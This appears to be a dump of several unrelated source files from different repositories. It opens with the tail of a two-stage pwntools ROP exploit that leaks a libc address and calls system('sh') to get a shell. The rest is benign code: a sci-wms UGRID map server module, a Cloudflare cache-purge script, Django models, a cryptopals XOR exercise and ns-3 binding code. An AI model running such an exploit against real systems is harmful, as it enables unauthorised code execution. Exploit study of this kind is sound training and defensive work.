#
# Write out the address of a libc routine so that we can calculate
# the base address of libc, then re-run the vulnerable routine so
# we can exploit.
#
rop1 = ROP(rex)
rop1.write(1, rex.got['read'], 4)
rop1.call(0x80483F4)
stage1 = padding + str(rop1)
log.info("Stage 1 Rop:\n%s" % rop1.dump())
log.info("Stage 1 Payload:\n%s" % hexdump(stage1))
r.send(stage1)
libc_read = u32(r.recv(4))
log.info("%#x libc read" % libc_read)
#
# Stage 2 we do system('sh').
#
# While we can write 'sh' to lots of places, it's easy enough
# to just find one in libc.
#
read_offset = libc.symbols['read'] - libc.address
libc.address = libc_read - read_offset
rop2 = ROP([rex,libc])
rop2.system(next(libc.search('sh\x00')))
stage2 = padding + str(rop2)
log.info("Stage 2 Rop:\n%s" % rop2.dump())
log.info("Stage 2 Payload:\n%s" % hexdump(stage2))
r.send(stage2)
#
# Can haz shell?
#
r.sendline('id')
log.success(r.recvrepeat().strip())
|
ayan-usgs/sci-wms
|
refs/heads/master
|
wms/models/datasets/ugrid.py
|
1
|
# -*- coding: utf-8 -*-
import os
import time
import bisect
import shutil
import tempfile
import itertools
from math import sqrt
from datetime import datetime
import pytz
from pyugrid import UGrid
from pyaxiom.netcdf import EnhancedDataset, EnhancedMFDataset
import numpy as np
import netCDF4
import pandas as pd
import matplotlib.tri as Tri
import rtree
from wms.models import Dataset, Layer, VirtualLayer, NetCDFDataset
from wms.utils import DotDict, calc_lon_lat_padding, calc_safety_factor, find_appropriate_time
from wms import data_handler
from wms import mpl_handler
from wms import gfi_handler
from wms import gmd_handler
from wms import logger
class UGridDataset(Dataset, NetCDFDataset):
@classmethod
def is_valid(cls, uri):
try:
with EnhancedDataset(uri) as ds:
return 'ugrid' in ds.Conventions.lower()
except RuntimeError:
try:
with EnhancedMFDataset(uri, aggdim='time') as ds:
return 'ugrid' in ds.Conventions.lower()
except (AttributeError, RuntimeError):
return False
except AttributeError:
return False
def has_cache(self):
return os.path.exists(self.topology_file)
def make_rtree(self):
p = rtree.index.Property()
p.overwrite = True
p.storage = rtree.index.RT_Disk
p.Dimension = 2
with self.dataset() as nc:
ug = UGrid.from_nc_dataset(nc=nc)
class FastRtree(rtree.Rtree):
def dumps(self, obj):
try:
import cPickle
return cPickle.dumps(obj, -1)
                    except ImportError:
                        # Python 3 has no cPickle; fall back to the default pickler
                        return super(FastRtree, self).dumps(obj)
def rtree_faces_generator_function():
for face_idx, node_list in enumerate(ug.faces):
nodes = ug.nodes[node_list]
xmin, ymin = np.min(nodes, 0)
xmax, ymax = np.max(nodes, 0)
yield (face_idx, (xmin, ymin, xmax, ymax), face_idx)
logger.info("Building Faces Rtree Topology Cache for {0}".format(self.name))
_, face_temp_file = tempfile.mkstemp(suffix='.face')
start = time.time()
FastRtree(face_temp_file,
rtree_faces_generator_function(),
properties=p,
overwrite=True,
interleaved=True)
logger.info("Built Faces Rtree Topology Cache in {0} seconds.".format(time.time() - start))
shutil.move('{}.dat'.format(face_temp_file), self.face_tree_data_file)
shutil.move('{}.idx'.format(face_temp_file), self.face_tree_index_file)
def rtree_nodes_generator_function():
for node_index, (x, y) in enumerate(ug.nodes):
yield (node_index, (x, y, x, y), node_index)
logger.info("Building Nodes Rtree Topology Cache for {0}".format(self.name))
_, node_temp_file = tempfile.mkstemp(suffix='.node')
start = time.time()
FastRtree(node_temp_file,
rtree_nodes_generator_function(),
properties=p,
overwrite=True,
interleaved=True)
logger.info("Built Nodes Rtree Topology Cache in {0} seconds.".format(time.time() - start))
shutil.move('{}.dat'.format(node_temp_file), self.node_tree_data_file)
shutil.move('{}.idx'.format(node_temp_file), self.node_tree_index_file)
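        # Query sketch (assumes the cache basenames saved above): the
        # persisted face index can later be reopened and asked for faces
        # whose bounding boxes intersect a lon/lat window, e.g.
        #   idx = rtree.index.Index(face_tree_basename)
        #   candidates = list(idx.intersection((minx, miny, maxx, maxy)))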
def update_cache(self, force=False):
with self.dataset() as nc:
ug = UGrid.from_nc_dataset(nc=nc)
ug.save_as_netcdf(self.topology_file)
if not os.path.exists(self.topology_file):
logger.error("Failed to create topology_file cache for Dataset '{}'".format(self.dataset))
return
time_vars = nc.get_variables_by_attributes(standard_name='time')
time_dims = list(itertools.chain.from_iterable([time_var.dimensions for time_var in time_vars]))
unique_time_dims = list(set(time_dims))
with EnhancedDataset(self.topology_file, mode='a') as cached_nc:
# create pertinent time dimensions if they aren't already present
for unique_time_dim in unique_time_dims:
dim_size = len(nc.dimensions[unique_time_dim])
try:
cached_nc.createDimension(unique_time_dim, size=dim_size)
except RuntimeError:
continue
# support cases where there may be more than one variable with standard_name='time' in a dataset
for time_var in time_vars:
try:
time_var_obj = cached_nc.createVariable(time_var._name,
time_var.dtype,
time_var.dimensions)
except RuntimeError:
time_var_obj = cached_nc.variables[time_var.name]
time_var_obj[:] = time_var[:]
time_var_obj.units = time_var.units
time_var_obj.standard_name = 'time'
# Now do the RTree index
self.make_rtree()
self.cache_last_updated = datetime.utcnow().replace(tzinfo=pytz.utc)
self.save()
def minmax(self, layer, request):
time_index, time_value = self.nearest_time(layer, request.GET['time'])
wgs84_bbox = request.GET['wgs84_bbox']
with self.dataset() as nc:
data_obj = nc.variables[layer.access_name]
data_location = data_obj.location
mesh_name = data_obj.mesh
ug = UGrid.from_ncfile(self.topology_file, mesh_name=mesh_name)
coords = np.empty(0)
if data_location == 'node':
coords = ug.nodes
elif data_location == 'face':
coords = ug.face_coordinates
elif data_location == 'edge':
coords = ug.edge_coordinates
lon = coords[:, 0]
lat = coords[:, 1]
spatial_idx = data_handler.lat_lon_subset_idx(lon, lat, wgs84_bbox.minx, wgs84_bbox.miny, wgs84_bbox.maxx, wgs84_bbox.maxy)
vmin = None
vmax = None
data = None
if isinstance(layer, Layer):
if (len(data_obj.shape) == 3):
z_index, z_value = self.nearest_z(layer, request.GET['elevation'])
data = data_obj[time_index, z_index, spatial_idx]
elif (len(data_obj.shape) == 2):
data = data_obj[time_index, spatial_idx]
elif len(data_obj.shape) == 1:
data = data_obj[spatial_idx]
else:
logger.debug("Dimension Mismatch: data_obj.shape == {0} and time = {1}".format(data_obj.shape, time_value))
if data is not None:
vmin = np.nanmin(data).item()
vmax = np.nanmax(data).item()
elif isinstance(layer, VirtualLayer):
                # Data needs to be [var1,var2] where each var is 1D (nodes only, elevation and time already handled)
data = []
for l in layer.layers:
data_obj = nc.variables[l.var_name]
if (len(data_obj.shape) == 3):
z_index, z_value = self.nearest_z(layer, request.GET['elevation'])
data.append(data_obj[time_index, z_index, spatial_idx])
elif (len(data_obj.shape) == 2):
data.append(data_obj[time_index, spatial_idx])
elif len(data_obj.shape) == 1:
data.append(data_obj[spatial_idx])
else:
logger.debug("Dimension Mismatch: data_obj.shape == {0} and time = {1}".format(data_obj.shape, time_value))
                if ',' in layer.var_name and data:
                    # Vectors, so return magnitude. `data` holds the u and v
                    # arrays; skip pairs with NaN components (note that
                    # `x != np.nan` is always True, so np.isnan is required).
                    data = [sqrt((u * u) + (v * v))
                            for (u, v) in zip(data[0], data[1])
                            if not (np.isnan(u) or np.isnan(v))]
                    vmin = min(data)
                    vmax = max(data)
return gmd_handler.from_dict(dict(min=vmin, max=vmax))
def getmap(self, layer, request):
time_index, time_value = self.nearest_time(layer, request.GET['time'])
wgs84_bbox = request.GET['wgs84_bbox']
with self.dataset() as nc:
data_obj = nc.variables[layer.access_name]
data_location = data_obj.location
mesh_name = data_obj.mesh
ug = UGrid.from_ncfile(self.topology_file, mesh_name=mesh_name)
coords = np.empty(0)
if data_location == 'node':
coords = ug.nodes
elif data_location == 'face':
coords = ug.face_coordinates
elif data_location == 'edge':
coords = ug.edge_coordinates
lon = coords[:, 0]
lat = coords[:, 1]
if request.GET['vectorscale'] is not None: # is not None if vectors are being plotted
vectorscale = request.GET['vectorscale']
padding_factor = calc_safety_factor(vectorscale)
vectorstep = request.GET['vectorstep'] # returns 1 by default if vectors are being plotted
spatial_idx_padding = calc_lon_lat_padding(lon, lat, padding_factor) * vectorstep
spatial_idx = data_handler.lat_lon_subset_idx(lon, lat,
wgs84_bbox.minx,
wgs84_bbox.miny,
wgs84_bbox.maxx,
wgs84_bbox.maxy,
padding=spatial_idx_padding
)
if vectorstep > 1:
np.random.shuffle(spatial_idx)
nvec = int(len(spatial_idx) / vectorstep)
spatial_idx = spatial_idx[:nvec]
else:
spatial_idx = data_handler.lat_lon_subset_idx(lon, lat,
wgs84_bbox.minx,
wgs84_bbox.miny,
wgs84_bbox.maxx,
wgs84_bbox.maxy
)
            face_indices = ug.faces[:]
            face_indices_spatial_idx = data_handler.faces_subset_idx(face_indices, spatial_idx)
            # If no triangles intersect the field of view, return a transparent tile
            if (len(spatial_idx) == 0) or (len(face_indices_spatial_idx) == 0):
logger.debug("No triangles in field of view, returning empty tile.")
return self.empty_response(layer, request)
if isinstance(layer, Layer):
if (len(data_obj.shape) == 3):
z_index, z_value = self.nearest_z(layer, request.GET['elevation'])
data = data_obj[time_index, z_index, :]
elif (len(data_obj.shape) == 2):
data = data_obj[time_index, :]
elif len(data_obj.shape) == 1:
data = data_obj[:]
else:
logger.debug("Dimension Mismatch: data_obj.shape == {0} and time = {1}".format(data_obj.shape, time_value))
return self.empty_response(layer, request)
if request.GET['image_type'] == 'filledcontours':
mask = np.isnan(data) # array with NaNs appearing as True
if mask.any():
data_mask = ~mask # negate the NaN boolean array; mask for non-NaN data elements
# slice the data, lon, and lat to get elements that correspond to non-NaN values
                        data = data[data_mask]
lon = lon[data_mask]
lat = lat[data_mask]
# recalculate the spatial index using the subsetted lat/lon
spatial_idx = data_handler.lat_lon_subset_idx(lon,
lat,
wgs84_bbox.minx,
wgs84_bbox.miny,
wgs84_bbox.maxx,
wgs84_bbox.maxy
)
                        face_indices_spatial_idx = data_handler.faces_subset_idx(face_indices, spatial_idx)
tri_subset = Tri.Triangulation(lon,
lat,
                                                   triangles=face_indices[face_indices_spatial_idx]
)
return mpl_handler.tricontourf_response(tri_subset,
data,
request
)
else:
raise NotImplementedError('Image type "{}" is not supported.'.format(request.GET['image_type']))
elif isinstance(layer, VirtualLayer):
                # Data needs to be [var1,var2] where each var is 1D (nodes only, elevation and time already handled)
data = []
for l in layer.layers:
data_obj = nc.variables[l.var_name]
if (len(data_obj.shape) == 3):
z_index, z_value = self.nearest_z(layer, request.GET['elevation'])
data.append(data_obj[time_index, z_index, :])
elif (len(data_obj.shape) == 2):
data.append(data_obj[time_index, :])
elif len(data_obj.shape) == 1:
data.append(data_obj[:])
else:
logger.debug("Dimension Mismatch: data_obj.shape == {0} and time = {1}".format(data_obj.shape, time_value))
return self.empty_response(layer, request)
if request.GET['image_type'] == 'vectors':
return mpl_handler.quiver_response(lon[spatial_idx],
lat[spatial_idx],
data[0][spatial_idx],
data[1][spatial_idx],
request,
vectorscale
)
else:
raise NotImplementedError('Image type "{}" is not supported.'.format(request.GET['image_type']))
def getfeatureinfo(self, layer, request):
with self.dataset() as nc:
with self.topology() as topo:
data_obj = nc.variables[layer.access_name]
data_location = data_obj.location
# mesh_name = data_obj.mesh
# Use local topology for pulling bounds data
# ug = UGrid.from_ncfile(self.topology_file, mesh_name=mesh_name)
geo_index, closest_x, closest_y, start_time_index, end_time_index, return_dates = self.setup_getfeatureinfo(topo, data_obj, request, location=data_location)
logger.info("Start index: {}".format(start_time_index))
logger.info("End index: {}".format(end_time_index))
logger.info("Geo index: {}".format(geo_index))
return_arrays = []
z_value = None
if isinstance(layer, Layer):
if len(data_obj.shape) == 3:
z_index, z_value = self.nearest_z(layer, request.GET['elevation'])
data = data_obj[start_time_index:end_time_index, z_index, geo_index]
elif len(data_obj.shape) == 2:
data = data_obj[start_time_index:end_time_index, geo_index]
elif len(data_obj.shape) == 1:
data = data_obj[geo_index]
else:
raise ValueError("Dimension Mismatch: data_obj.shape == {0} and time indexes = {1} to {2}".format(data_obj.shape, start_time_index, end_time_index))
return_arrays.append((layer.var_name, data))
elif isinstance(layer, VirtualLayer):
                    # Data needs to be [var1,var2] where each var is 1D (nodes only, elevation and time already handled)
for l in layer.layers:
data_obj = nc.variables[l.var_name]
if len(data_obj.shape) == 3:
z_index, z_value = self.nearest_z(layer, request.GET['elevation'])
data = data_obj[start_time_index:end_time_index, z_index, geo_index]
elif len(data_obj.shape) == 2:
data = data_obj[start_time_index:end_time_index, geo_index]
elif len(data_obj.shape) == 1:
data = data_obj[geo_index]
else:
raise ValueError("Dimension Mismatch: data_obj.shape == {0} and time indexes = {1} to {2}".format(data_obj.shape, start_time_index, end_time_index))
return_arrays.append((l.var_name, data))
# Data is now in the return_arrays list, as a list of numpy arrays. We need
# to add time and depth to them to create a single Pandas DataFrame
if (len(data_obj.shape) == 3):
df = pd.DataFrame({'time': return_dates,
'x': closest_x,
'y': closest_y,
'z': z_value})
elif (len(data_obj.shape) == 2):
df = pd.DataFrame({'time': return_dates,
'x': closest_x,
'y': closest_y})
elif (len(data_obj.shape) == 1):
df = pd.DataFrame({'x': closest_x,
'y': closest_y})
else:
df = pd.DataFrame()
# Now add a column for each member of the return_arrays list
for (var_name, np_array) in return_arrays:
df.loc[:, var_name] = pd.Series(np_array, index=df.index)
return gfi_handler.from_dataframe(request, df)
def wgs84_bounds(self, layer):
with self.dataset() as nc:
try:
data_location = nc.variables[layer.access_name].location
mesh_name = nc.variables[layer.access_name].mesh
# Use local topology for pulling bounds data
ug = UGrid.from_ncfile(self.topology_file, mesh_name=mesh_name)
coords = np.empty(0)
if data_location == 'node':
coords = ug.nodes
elif data_location == 'face':
coords = ug.face_coordinates
elif data_location == 'edge':
coords = ug.edge_coordinates
minx = np.nanmin(coords[:, 1])
miny = np.nanmin(coords[:, 0])
maxx = np.nanmax(coords[:, 1])
maxy = np.nanmax(coords[:, 0])
return DotDict(minx=minx, miny=miny, maxx=maxx, maxy=maxy)
except AttributeError:
pass
def nearest_z(self, layer, z):
"""
Return the z index and z value that is closest
"""
depths = self.depths(layer)
depth_idx = bisect.bisect_right(depths, z)
try:
depths[depth_idx]
except IndexError:
depth_idx -= 1
return depth_idx, depths[depth_idx]
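    # e.g. with depths == [0, 10, 20] (illustrative): nearest_z(layer, 15)
    # bisects to index 2 and returns (2, 20); a z past the last depth falls
    # back to the final index via the IndexError guard.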
def times(self, layer):
with self.topology() as nc:
time_vars = nc.get_variables_by_attributes(standard_name='time')
if len(time_vars) == 1:
time_var = time_vars[0]
else:
                # if there is more than one variable with standard_name = time,
                # find the appropriate one to use with the layer
var_obj = nc.variables[layer.access_name]
time_var_name = find_appropriate_time(var_obj, time_vars)
time_var = nc.variables[time_var_name]
return netCDF4.num2date(time_var[:], units=time_var.units)
def depth_variable(self, layer):
with self.dataset() as nc:
try:
layer_var = nc.variables[layer.access_name]
for cv in layer_var.coordinates.strip().split():
try:
coord_var = nc.variables[cv]
if hasattr(coord_var, 'axis') and coord_var.axis.lower().strip() == 'z':
return coord_var
elif hasattr(coord_var, 'positive') and coord_var.positive.lower().strip() in ['up', 'down']:
return coord_var
except BaseException:
pass
except AttributeError:
pass
def depth_direction(self, layer):
d = self.depth_variable(layer)
if d is not None:
if hasattr(d, 'positive'):
return d.positive
return 'unknown'
def depths(self, layer):
d = self.depth_variable(layer)
if d is not None:
return range(0, d.shape[0])
return []
def humanize(self):
return "UGRID"
|
ebmdatalab/openprescribing
|
refs/heads/dependabot/pip/google-auth-1.32.1
|
deploy/clear_cache.py
|
1
|
import json
import os
import requests
import dotenv
# This zone ID may change if/when our account changes
# Run `list_cloudflare_zones` (below) to get a full list
ZONE_ID = "198bb61a3679d0e1545e838a8f0c25b9"
def list_cloudflare_zones():
url = "https://api.cloudflare.com/client/v4/zones"
headers = {
"Content-Type": "application/json",
"X-Auth-Key": os.environ["CF_API_KEY"],
"X-Auth-Email": os.environ["CF_API_EMAIL"],
}
result = json.loads(requests.get(url, headers=headers).text)
zones = [{"name": x["name"], "id": x["id"]} for x in result["result"]]
print(zones)
def clear_cloudflare():
url = "https://api.cloudflare.com/client/v4/zones/%s"
headers = {
"Content-Type": "application/json",
"X-Auth-Key": os.environ["CF_API_KEY"],
"X-Auth-Email": os.environ["CF_API_EMAIL"],
}
data = {"purge_everything": True}
result = json.loads(
requests.delete(
url % ZONE_ID + "/purge_cache", headers=headers, data=json.dumps(data)
).text
)
if result["success"]:
print("Cloudflare clearing succeeded")
else:
raise ValueError(
"Cloudflare clearing failed: %s" % json.dumps(result, indent=2)
)
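def clear_cloudflare_urls(urls):
    # Illustrative sketch, not wired into the deploy flow: the same purge
    # endpoint accepts a "files" list of fully-qualified URLs for selective
    # purging instead of purge_everything.
    url = "https://api.cloudflare.com/client/v4/zones/%s/purge_cache" % ZONE_ID
    headers = {
        "Content-Type": "application/json",
        "X-Auth-Key": os.environ["CF_API_KEY"],
        "X-Auth-Email": os.environ["CF_API_EMAIL"],
    }
    result = json.loads(
        requests.delete(url, headers=headers, data=json.dumps({"files": urls})).text
    )
    return result["success"]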
if __name__ == "__main__":
env_path = os.path.join(
os.path.dirname(os.path.realpath(__file__)), "..", "environment"
)
dotenv.read_dotenv(env_path, override=True)
clear_cloudflare()
|
morphgnt/morphgnt-api
|
refs/heads/master
|
morphgnt_api/models.py
|
1
|
from django.core.urlresolvers import reverse
from django.db import models
from .ref import verse_from_bcv, verse_range_title
def parse_as_dict(parse):
return {
label: parse[i]
for i, label in enumerate([
"person", "tense", "voice", "mood", "case", "number", "gender", "degree"
])
if parse[i] != "-"
}
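# e.g. (illustrative parse code) parse_as_dict("3PAI-S--") returns
# {"person": "3", "tense": "P", "voice": "A", "mood": "I", "number": "S"}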
class Word(models.Model):
word_id = models.CharField(max_length=11, db_index=True)
verse_id = models.CharField(max_length=6, db_index=True)
paragraph_id = models.CharField(max_length=5, db_index=True)
sentence_id = models.CharField(max_length=6, db_index=True)
pos = models.CharField(max_length=2)
parse = models.CharField(max_length=8)
crit_text = models.CharField(max_length=50)
text = models.CharField(max_length=50)
word = models.CharField(max_length=50)
norm = models.CharField(max_length=50)
lemma = models.CharField(max_length=50)
dep_type = models.CharField(max_length=4)
head = models.CharField(max_length=11, null=True)
class Meta:
ordering = ["word_id"]
@staticmethod
def get_full_id(word_id):
return reverse("word", args=[word_id]) if word_id else None
def to_dict(self):
d = {
"@id": Word.get_full_id(self.word_id),
"@type": "word",
"verse_id": Verse.get_full_id(self.verse_id),
"paragraph_id": Paragraph.get_full_id(self.paragraph_id),
"sentence_id": Sentence.get_full_id(self.sentence_id),
"pos": self.pos.strip("-"),
"crit_text": self.crit_text,
"text": self.text,
"word": self.word,
"norm": self.norm,
"lemma": self.lemma,
"dep_type": self.dep_type,
"head": Word.get_full_id(self.head),
}
d.update(parse_as_dict(self.parse))
return d
class Paragraph(models.Model):
paragraph_id = models.CharField(max_length=5, db_index=True)
book_osis_id = models.CharField(max_length=6, db_index=True)
prev_paragraph = models.CharField(max_length=5, null=True)
next_paragraph = models.CharField(max_length=5, null=True)
class Meta:
ordering = ["paragraph_id"]
@staticmethod
def get_full_id(paragraph_id):
return reverse("paragraph", args=[paragraph_id]) if paragraph_id else None
def words(self):
return Word.objects.filter(paragraph_id=self.paragraph_id)
def to_dict(self):
words = list(self.words())
first_verse_id = words[0].verse_id
last_verse_id = words[-1].verse_id
return {
"@id": Paragraph.get_full_id(self.paragraph_id),
"title": verse_range_title(first_verse_id, last_verse_id),
"@type": "paragraph",
"prev": Paragraph.get_full_id(self.prev_paragraph),
"next": Paragraph.get_full_id(self.next_paragraph),
"book": Book.get_full_id(self.book_osis_id),
"words": [w.to_dict() for w in words],
}
class Sentence(models.Model):
sentence_id = models.CharField(max_length=6, db_index=True)
book_osis_id = models.CharField(max_length=6, db_index=True)
prev_sentence = models.CharField(max_length=6, null=True)
next_sentence = models.CharField(max_length=6, null=True)
class Meta:
ordering = ["sentence_id"]
@staticmethod
def get_full_id(sentence_id):
return reverse("sentence", args=[sentence_id]) if sentence_id else None
def words(self):
return Word.objects.filter(sentence_id=self.sentence_id)
def to_dict(self):
words = list(self.words())
first_verse_id = words[0].verse_id
last_verse_id = words[-1].verse_id
return {
"@id": Sentence.get_full_id(self.sentence_id),
"title": verse_range_title(first_verse_id, last_verse_id),
"@type": "sentence",
"prev": Sentence.get_full_id(self.prev_sentence),
"next": Sentence.get_full_id(self.next_sentence),
"book": Book.get_full_id(self.book_osis_id),
"words": [w.to_dict() for w in words],
}
class Verse(models.Model):
verse_id = models.CharField(max_length=6, db_index=True)
book_osis_id = models.CharField(max_length=6, db_index=True)
prev_verse = models.CharField(max_length=6, null=True)
next_verse = models.CharField(max_length=6, null=True)
class Meta:
ordering = ["verse_id"]
@staticmethod
def get_full_id(verse_id):
return reverse("verse", args=[verse_id]) if verse_id else None
def words(self):
return Word.objects.filter(verse_id=self.verse_id)
def to_dict(self):
return {
"@id": reverse("verse", args=[self.verse_id]),
"title": verse_from_bcv(self.verse_id).title,
"@type": "verse",
"book": reverse("book", args=[self.book_osis_id]),
"prev": Verse.get_full_id(self.prev_verse),
"next": Verse.get_full_id(self.next_verse),
"words": [w.to_dict() for w in self.words()],
}
class Book(models.Model):
book_osis_id = models.CharField(max_length=6, db_index=True)
name = models.CharField(max_length=20)
sblgnt_id = models.CharField(max_length=2)
class Meta:
ordering = ["sblgnt_id"]
@staticmethod
def get_full_id(book_osis_id):
return reverse("book", args=[book_osis_id]) if book_osis_id else None
def first_verse(self):
return Verse.objects.filter(book_osis_id=self.book_osis_id)[0]
def first_sentence(self):
return Sentence.objects.filter(book_osis_id=self.book_osis_id)[0]
def first_paragraph(self):
return Paragraph.objects.filter(book_osis_id=self.book_osis_id)[0]
def to_dict(self):
return {
"@id": Book.get_full_id(self.book_osis_id),
"@type": "book",
"name": self.name,
"root": reverse("root"),
"first_verse": Verse.get_full_id(self.first_verse().verse_id),
"first_sentence": Sentence.get_full_id(self.first_sentence().sentence_id),
"first_paragraph": Paragraph.get_full_id(self.first_paragraph().paragraph_id),
}
|
dencold/blt
|
refs/heads/master
|
blt/test/importedtest.py
|
1
|
from blt.environment import Commander
class TestCommands(Commander):
def imported_command():
pass
def imported_default():
pass
def imported_alias():
pass
|
bruteforce1/cryptopals
|
refs/heads/master
|
set1/ch2/fixedxor.py
|
1
|
#!/usr/bin/python3
"""
Write a function that takes two equal-length buffers and produces their
XOR combination.
If your function works properly, then when you feed it the string:
1c0111001f010100061a024b53535009181c
... after hex decoding, and when XOR'd against:
686974207468652062756c6c277320657965
... should produce:
746865206b696420646f6e277420706c6179
"""
import argparse
import sys
import binascii
def xor_binary_strings(str1, str2):
if len(str1) != len(str2):
print('XOR strings must be same length')
return ''
if len(str1) % 2 == 1:
print('Hexadecimal strings must be even length')
return ''
    bstr1 = binascii.unhexlify(str1)
    bstr2 = binascii.unhexlify(str2)
    # XOR byte-by-byte and build a bytes object directly; a chr()/encode('utf-8')
    # round-trip would mangle byte values above 0x7f
    return binascii.hexlify(bytes(x ^ y for x, y in zip(bstr1, bstr2))).decode('ascii')
def main():
ret = xor_binary_strings('1c0111001f010100061a024b53535009181c', '686974207468652062756c6c277320657965')
print(ret)
if ret == '746865206b696420646f6e277420706c6179':
print('It worked!')
return 0
return -1
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description='Tests XOR\'ing a fixed hex value against another fixed \
string.'
)
args = parser.parse_args()
sys.exit(main())
|
erikge/watch_gyp
|
refs/heads/master
|
test/win/gyptest-link-debug-info.py
|
344
|
#!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Make sure debug info setting is extracted properly.
"""
import TestGyp
import sys
if sys.platform == 'win32':
test = TestGyp.TestGyp(formats=['msvs', 'ninja'])
CHDIR = 'linker-flags'
test.run_gyp('debug-info.gyp', chdir=CHDIR)
test.build('debug-info.gyp', test.ALL, chdir=CHDIR)
suffix = '.exe.pdb' if test.format == 'ninja' else '.pdb'
test.built_file_must_not_exist('test_debug_off%s' % suffix, chdir=CHDIR)
test.built_file_must_exist('test_debug_on%s' % suffix, chdir=CHDIR)
test.pass_test()
|
shinglyu/ns3-h264-svc
|
refs/heads/master
|
src/config-store/bindings/modulegen__gcc_ILP32.py
|
72
|
from pybindgen import Module, FileCodeSink, param, retval, cppclass, typehandlers
import pybindgen.settings
import warnings
class ErrorHandler(pybindgen.settings.ErrorHandler):
def handle_error(self, wrapper, exception, traceback_):
warnings.warn("exception %r in wrapper %s" % (exception, wrapper))
return True
pybindgen.settings.error_handler = ErrorHandler()
import sys
def module_init():
root_module = Module('ns.config_store', cpp_namespace='::ns3')
return root_module
def register_types(module):
root_module = module.get_root()
## callback.h (module 'core'): ns3::CallbackBase [class]
module.add_class('CallbackBase', import_from_module='ns.core')
## file-config.h (module 'config-store'): ns3::FileConfig [class]
module.add_class('FileConfig', allow_subclassing=True)
## gtk-config-store.h (module 'config-store'): ns3::GtkConfigStore [class]
module.add_class('GtkConfigStore')
## file-config.h (module 'config-store'): ns3::NoneFileConfig [class]
module.add_class('NoneFileConfig', parent=root_module['ns3::FileConfig'])
## object-base.h (module 'core'): ns3::ObjectBase [class]
module.add_class('ObjectBase', allow_subclassing=True, import_from_module='ns.core')
## type-id.h (module 'core'): ns3::TypeId [class]
module.add_class('TypeId', import_from_module='ns.core')
## type-id.h (module 'core'): ns3::TypeId::AttributeFlag [enumeration]
module.add_enum('AttributeFlag', ['ATTR_GET', 'ATTR_SET', 'ATTR_CONSTRUCT', 'ATTR_SGC'], outer_class=root_module['ns3::TypeId'], import_from_module='ns.core')
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation [struct]
module.add_class('AttributeInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId'])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation [struct]
module.add_class('TraceSourceInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId'])
## empty.h (module 'core'): ns3::empty [class]
module.add_class('empty', import_from_module='ns.core')
## config-store.h (module 'config-store'): ns3::ConfigStore [class]
module.add_class('ConfigStore', parent=root_module['ns3::ObjectBase'])
## config-store.h (module 'config-store'): ns3::ConfigStore::Mode [enumeration]
module.add_enum('Mode', ['LOAD', 'SAVE', 'NONE'], outer_class=root_module['ns3::ConfigStore'])
## config-store.h (module 'config-store'): ns3::ConfigStore::FileFormat [enumeration]
module.add_enum('FileFormat', ['XML', 'RAW_TEXT'], outer_class=root_module['ns3::ConfigStore'])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeChecker', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeChecker>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeValue', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeValue>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::CallbackImplBase', 'ns3::empty', 'ns3::DefaultDeleter<ns3::CallbackImplBase>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::TraceSourceAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::TraceSourceAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor [class]
module.add_class('TraceSourceAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >'])
## attribute.h (module 'core'): ns3::AttributeAccessor [class]
module.add_class('AttributeAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >'])
## attribute.h (module 'core'): ns3::AttributeChecker [class]
module.add_class('AttributeChecker', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >'])
